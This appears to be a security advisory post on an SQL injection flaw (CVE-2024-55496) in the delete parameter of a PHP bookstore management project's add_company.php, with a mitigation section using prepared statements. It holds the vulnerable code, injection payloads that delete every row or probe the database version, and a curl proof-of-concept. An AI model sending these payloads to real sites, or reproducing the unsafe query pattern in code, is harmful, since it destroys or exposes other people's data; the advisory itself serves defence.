CVE-2024-55496 - SQL Injection in 100projects Bookstore Management System 1. (add_company.php Exploit)

A new vulnerability labeled as CVE-2024-55496 has been discovered in the 100projects Bookstore Management System PHP MySQL Project 1.. This vulnerability can allow attackers to perform SQL injection—one of the most common and dangerous web application exploits. The issue is specifically found in the add_company.php file, involving unsafe handling of the delete parameter.

In this post, we’ll break down how the vulnerability works, how a simple attack can be performed, and how you can protect your application if you’re using this project.

What is SQL Injection?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries your application makes to its database. It typically allows attackers to view data they aren’t supposed to see, but can also be used to delete data, change database content, and in some cases, even take over the server.

Vulnerable Functionality: add_company.php

The vulnerable script, add_company.php, takes user input through the delete parameter and uses it directly in a SQL query, without proper validation or sanitization. This failure allows attackers to inject malicious SQL code by manipulating the request.

Example of Vulnerable PHP Code

// add_company.php

if (isset($_REQUEST['delete'])) {
    $delete_id = $_REQUEST['delete'];
    $query = "DELETE FROM company WHERE id = $delete_id";
    mysqli_query($conn, $query);
}

If the attacker sends a request like

http://your-bookstore.com/add_company.php?delete=1 OR 1=1

The SQL query becomes

DELETE FROM company WHERE id = 1 OR 1=1

OR 1=1 is always true, which causes the query to delete EVERY row in the company table!

- Depending on the payload, attackers can also read sensitive data or even escalate the attack further if error messages are shown.

More advanced attack

Suppose an attacker wants to extract data. In an error-based injection scenario, they could send something like:

http://your-bookstore.com/add_company.php?delete=1 UNION SELECT 1, version() --

If the database outputs errors or data handy for the attacker, they can learn about the MySQL version and structure.

Here’s a simple PoC curl command to exploit the vulnerability

curl "http://your-bookstore.com/add_company.php?delete= OR 1=1"

Mitigation

To fix this issue, never insert user input directly into SQL queries. Always use prepared statements or at least cast and escape your variables.

Secure PHP Example Using Prepared Statements

// add_company.php

if (isset($_REQUEST['delete'])) {
    $delete_id = intval($_REQUEST['delete']);
    $stmt = mysqli_prepare($conn, "DELETE FROM company WHERE id = ?");
    mysqli_stmt_bind_param($stmt, "i", $delete_id);
    mysqli_stmt_execute($stmt);
}

References

- Original Project Source
- MITRE CVE Directory (CVE-2024-55496) (To be published)
- OWASP: SQL Injection

Conclusion

CVE-2024-55496 is a critical and easy-to-exploit vulnerability in the 100projects Bookstore Management PHP Project 1.. Anybody running this software in production should patch it immediately by using prepared statements and validating input. Unpatched, anyone can delete or manipulate company records—and possibly do much worse.

If you're running this or similar legacy PHP apps, check your code! Today’s simple mistake can be tomorrow’s disaster. Stay safe and keep your code secure.

Timeline

Published on: 12/17/2024 18:15:25 UTC
Last modified on: 12/20/2024 21:15:09 UTC